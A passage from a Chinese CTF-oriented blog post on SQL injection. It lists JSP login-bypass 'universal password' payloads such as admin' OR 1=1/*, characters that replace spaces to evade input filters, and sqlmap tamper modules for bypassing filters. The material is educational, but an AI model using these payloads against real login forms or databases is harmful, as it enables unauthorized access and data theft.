<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<h4 id="jsp-万能密码"><a href="#jsp-万能密码" class="headerlink" title="jsp 万能密码"></a>jsp 万能密码</h4><pre class="line-numbers language-HTTP"><code class="language-HTTP">1’or’1’=’1
admin’ OR 1=1/*
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<h3 id="过滤字符"><a href="#过滤字符" class="headerlink" title="过滤字符"></a>过滤字符</h3><h4 id="1、过滤空格"><a href="#1、过滤空格" class="headerlink" title="1、过滤空格"></a>1、过滤空格</h4><p>笼统的说就是不读取空格或空格后的语句被注释</p>
<h4 id="2、特殊符号替代"><a href="#2、特殊符号替代" class="headerlink" title="2、特殊符号替代"></a>2、特殊符号替代</h4><pre><code>//
#
/**/
</code></pre>
<p>以上符号都可以代替空格使用</p>
<h4 id="3、sqlmap自动注入法"><a href="#3、sqlmap自动注入法" class="headerlink" title="3、sqlmap自动注入法"></a>3、sqlmap自动注入法</h4><p>可以使用sqlmap自带的模块，以下列出几个常用模块↓</p>
<blockquote>
<p>1、space2comment</p>
<p>作用：Replaces space character  ‘ ‘  with comments   &#x2F;**&#x2F;</p>
<p>用注释&#x2F;**&#x2F;替换空格字符’ ‘</p>
<p>2、equaltolike</p>
<p>作用：用like代替等号</p>
<p>3、apostrophemask</p>
<p>作用：用UTF-8代替引号</p>
<p>4、greatest</p>
<p>作用：绕过过滤’&gt;’ ,用GREATEST替换大于号</p>
</blockquote>
<p>未完待续……..</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Rmy4x</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://rmy4x.github.io/2023/10/15/SQL%E6%B3%A8%E5%85%A5/">https://rmy4x.github.io/2023/10/15/SQL%E6%B3%A8%E5%85%A5/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Rmy4x</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/CTF/">
                                    <span class="chip bg-color">CTF</span>
                                </a>
                            
                                <a href="/tags/SQL/">
                                    <span class="chip bg-color">SQL</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2023/10/15/java%E5%AD%A6%E4%B9%A0%E5%B0%8F%E8%AE%A1-%E5%9F%BA%E7%A1%80%E7%AF%87/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/10.png" class="responsive-img" alt="java学习小计(基础篇)">
                        
                        <span class="card-title">java学习小计(基础篇)</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2023-10-15
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/Java-%E5%9F%BA%E7%A1%80/" class="post-category">
                                    Java 基础
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Java/">
                        <span class="chip bg-color">Java</span>
                    </a>
                    
                    <a href="/tags/%E5%9F%BA%E7%A1%80/">
                        <span class="chip bg-color">基础</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2023/10/15/SRC%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E7%AF%87/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/6.png" class="responsive-img" alt="SRC之信息收集篇">
                        
                        <span class="card-title">SRC之信息收集篇</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2023-10-15
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/src-%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" class="post-category">
                                    src 信息收集!
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/src/">
                        <span class="chip bg-color">src</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="4979251588"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    
    <div class="container row center-align" style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2023</span>
            
            <span id="year">2023</span>
            <a href="/about" target="_blank">Rmy4x</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/blinkfox" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:1311708400@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=1311708400" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 1311708400" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

	
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
